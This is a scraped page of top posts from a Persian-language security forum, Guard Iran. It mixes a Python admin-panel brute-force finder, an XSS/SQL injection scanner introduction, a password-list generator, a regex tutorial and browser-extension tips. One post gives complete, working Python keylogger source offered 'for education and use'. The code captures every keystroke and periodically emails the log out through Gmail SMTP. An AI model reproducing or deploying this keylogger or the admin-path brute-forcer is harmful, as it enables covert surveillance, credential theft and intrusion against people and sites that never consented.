  41. درود خدمت تمامی گارد ایرانی های عزیز تکه کدی رو قبلاً براتون آماده کردم بودم که باهاش می تونستید admin سایت ها رو پیدا کنید (با زبان شیرین Python) این یک تکه کد جدید پایتونی من هست، توی این کد ما خطوط فایل txt رو می خونیم و به دامنه اضافه می کنیم با این کار وجود صفحه ادمین رو بررسی می کنیم، لازم به ذکر هست که منبع موجود نیست و کد از آرشیو برداشته شده و در اختیار گارد ایرانی های عزیز قرار گرفته می شه، صحبت دیگه کافیه، میریم سراغ کدها : import requests from requests.adapters import HTTPAdapter from requests.packages.urllib3.util.retry import Retry def admin_finder(domain,GREEN,RED,RESET): url = "http://"+domain session = requests.Session() retry = Retry(connect=3, backoff_factor=0.5) adapter = HTTPAdapter(max_retries=retry) session.mount('http://', adapter) session.mount('https://', adapter) pages = open('modules/admins.txt','r').read().splitlines() for page in pages : full_address = url+"/"+page if session.get(full_address).status_code == 200: print(f" {GREEN} {full_address} is Exsists ====> 200 {RESET}") else : print(f" {RED} {full_address} is Not Exsists ====> 404 {RESET} ") لازم به ذکر هست که فایل txt که شامل آدرس های admin ها هست (415 خط) رو ضمیمه کردم که می تونید کنار کدتون ازش استفاده کنید با اینکه یک txt اختصاصی برای خودتون ایجاد کنید. پسورد فایل : guardiran.org admins.zip
    1 امتیاز
  42. Night

    اسکنر webpwn

    سلام خدمت دوستان و استاتید سایت گارد ایران، در این تاپیک قصد دارم اسکنری معرفی کنم که وبسایت رو از نظر باگ xss و sql اسکن میکنه. در ابتدا این ابزار رو از این لینک دانلود کنید. سپس ابزار رو نصب کنید. بعد از نصب ابزار،آن را با دستور scan/. اجرا کنید. از شما میپرسه لیستی از وبسایت ها رو میخوای اسکن کنم یا یک ادرس سایت رو اسکن کنم. بعد از وارد کردن شماره مورد نظر و آدرس وبسایت،شروع به اسکن باگ های xss و sql میکنه و نتیجه رو نشون میده. امید وارم مفیدواقع شده باشه.
    1 امتیاز
  43. عزیزم دانلود که میکنی فایل txt میده اونجا لینک اصلی هست موفق باشید.
    1 امتیاز
  44. توسط این کلاس می تونید کلید های ثبت شده رو ذخیره و توسط تابع ارسال ایمیل (SMTP) با Gmail ارسال کنید. (جهت آموزش و استفاده) #!/usr/bin/env python import pynput.keyboard import threading import smtplib class Keylogger: def __init__(self,time_interval,email,password): self.log="Keylogger started" self.interval=time_interval self.email=email self.password=password def append_to_log(self,string): self.log=self.log+string def process_key_press(self,key): try: current_key=str(key.char) except AttributeError: if key==key.space: current_key=" " else: current_key=" "+str(key)+" " self.append_to_log(current_key) def report(self): self.send_mail(self.email,self.password,"\n\n"+self.log) self.log="" timer=threading.Timer(self.interval,self.report) timer.start() def send_mail(self,email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) server.sendmail(email, email, message) server.quit() def start(self): keyboard_listener=pynput.keyboard.Listener(on_press=self.process_key_press) with keyboard_listener: self.report() keyboard_listener.join()
    1 امتیاز
  45. R3XCR4PY

    افزونه Privacy Pass

    اگر از اینترنت های عمومی، فیلترشکن ها، تور و ... استفاده کرده باشید حتما دیدید که برای ورود به اکثر سایت هایی که پشت کلودفلر هستند باید کپچا حل کنید و این خیلی اعصاب خرد کنه. طرز کار این افزونه اینجوری هست که وقتی یک کپچا رو حل کردید مقداری توکن (۳۰) تولید میکنه و برای کپچا های بعدی از اون توکن ها استفاده میکنه، یعنی دفعه بعد که وارد سایت دارای کپچا شدید دیگه نیاز نیست کپچا رو حل کنید و یکی از توکن ها مصرف میشه. درحال حاضر این افزونه فقط با کلودفلر و hCaptcha کار میکنه. میتونید این افزونه رو از لینک های زیر نصب کنید: Chrome Firefox سورس افزونه در گیت هاب بعد از نصب افزونه از طریق منوی اون توکن هاتون رو افزایش بدید. بعد از کلیک روی یکی از گزینه ها (Cloudflare یا hCaptcha) وارد صفحه ای میشه که در اونجا یک کپچا وجود داره وقتی اون رو حل کنید ۳۰تا توکن بهتون میده و روی آیکن افزونه و همچنین در منوی افزونه نمایش داده میشه. حالا اگر وارد سایتی بشید و به خاطر ترافیک زیادی که به سمت اون سایت رفته صفحه کلودفلر نمایش داده بشه (یا hCaptcha در سایت های دیگه)‌ بدون نیاز به حل کپچا، این افزونه صفحه رو رد میکنه. video.mp4
    1 امتیاز
  46. سوال:‌ صدگان خسته https://b2n.ir/957810 program.py program.cpp
    1 امتیاز
  47. سوال: دو نقطه خط https://b2n.ir/n47769 program.py program.rb program.c
    1 امتیاز
  48. درود با این نرم افزار میتونید پسورد لیست ( Password List ) دخواه خودتون رو بسازید. یکی از ویژگی های این برنامه پشتیبانی از همه کراکتر ها هست. پسورد فایل : guardiran.org sibop.rar
    1 امتیاز
  49. با سلام عبارت Regular Expressions به معنی عبارات منظم (اصطلاحات با قاعده ) و مخفف آن re از حروف اول این عبارت گرفته شده است . از کاربرد این مبحث میشه به : استخراج اطلاعات از دیتابیس ها - متون - کد ها - لوگ فایل ها - صفحات گسترده ای با متون زیاد - اسناد و هر چی که داخلش متن باشه . شما با استفاده از این عبارات میتونید اطلاعات <<خاصی>> که مد نظر دارید استخراح کنید. اولین چیزی که نیاز دارید بفهمید اینه که هر چیزی یه کاراکتر به حساب میاد و ما تو اینجا قصد داریم یه تیکه رشته رو از میان یه رشته دیگه بکشیم بیرون که دارای کاراکتر های خاصی هست. نکته : همانطور که گفته شد تمام علایم و حروف و نماد ها و سیمبل ها همگی کاراکتر هستند. مثال : میخواهیم از رشته های زیر abc را جدا کنیم : abcdefg abcde abc خب ما الان فقط abc رو میخوایم پس ریجکس این مثال میشه همون : abc در واقع یافتن صرفا یه کلمه یا یه حرف یا عدد یا ... که میدونیم چیه داخل یه رشته کافیه همون رو بکار ببریم مثلا من میخواستم abc رو از رشته بکشم بیرون پس همین رو به عنوان ریجکس قرار میدم یعنی : abc . مثال دیگر : abc123g-moj حالا من 123 رو میخوام پس فقط ریجکس میشه همون 123 اما یه کار دیگم میتونید بکنید - کاراکتر w\ برای اشاره کردن به حروف زبان انگلیسی و اعداد هست و این کاراکتر به تنهایی یعنی (هر حرف زبان انگلیسی و اعداد) - w مخفف کلمه word هست . مثلا ما در سه رشته بالا میدونیم abc در سمت چپ رشته ها قرار دارد پس برای یافتن abc نوشتن ریجکس زیر کفایت میکند : \w\w\w ریجکس بالا مفهومش این است : از سمت چپ سه حرف انگلیسی یا سه عدد اول رو نشون بده . با گذاشتن یک + در انتهای این کاراکتر میتوانید بگویید تمام کاراکتر هارا به من نشان بده : \w+ یعنی : از سمت چپ تمام حروف انگلیسی و اعداد موجود در رشته هارا در نظر بگیر . پس برای هر رشته جواب همون رشته هاست یعنی : abcdefg ==> \w+ ==> abcdefg abcde ==> \w+ ==> abcde abc ==> \w+ ==> abc نکته بعدی : اگر میخواید از تکرار کاراکتر w\ جلوگیری کنید مثلا بجای اینکه بنویسید w\w\w\ از یه کاراکتر w\ استفاده کنید اما باز نتیجه ی w\w\w\ را بدهد میتوانید از آکولاد استفاده کنید . به مثال زیر توجه کنید: Guardiran ==> \w{4} ==> Guar Mojtaba ==> \w{5} ==> mojta مثال های دیگر : mojtaba ==> \w\w\w ==> moj mojtaba ==> \w+ ==> mojtaba guardiran ==> \w\w\w\w ==> guar Team ==> \w{1,3} ==> Tea --> معنیش میشه اینکه حداکثر تا سه کاراکتر رو نشون بده security ==> \w{3} ==> sec password ==> \w{4} ==> pass 123Guard ==> \w{3} ==> 123 123Guard ==> \w\w\w ==> 123 در درس های بعدی بیشتر با w\ اشنا میشویم پس اگر اشکال دارید بعدا دوباره توضیح خواهیم داد. آموزش نیاز به درک کاملی از رشته ها و کاراکتر ها در پایتون دارد . مبحث ریجکس کار عملیه پس باید حتما پا به پای آموزش بررسی کنید مثال هارو .
    1 امتیاز
  50. برنامه اسمارت کال رو دان کنین واردش بشین و تو قسمت کشور ایرانو انتخاب کنین پایینش شمارتونو بدون صفر اولی ب شکل 9140000000 وارد کنید بعد submit رو بزنید بعدش چن دقیقه بصبرید تا براتون ی کد بیاد برنامه بطور خودکار کدو تایید میکنه و وراد برنامه مشین تو قسمت more شمارتونو نشون میده در ضمن باید تو قسمت more انلاین باشید فک نکنم ب تاپیک جدید نیاز باشه واس همین اینجا گذاشتم #شماره_مجازی
    1 امتیاز

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
  • اضافه کردن...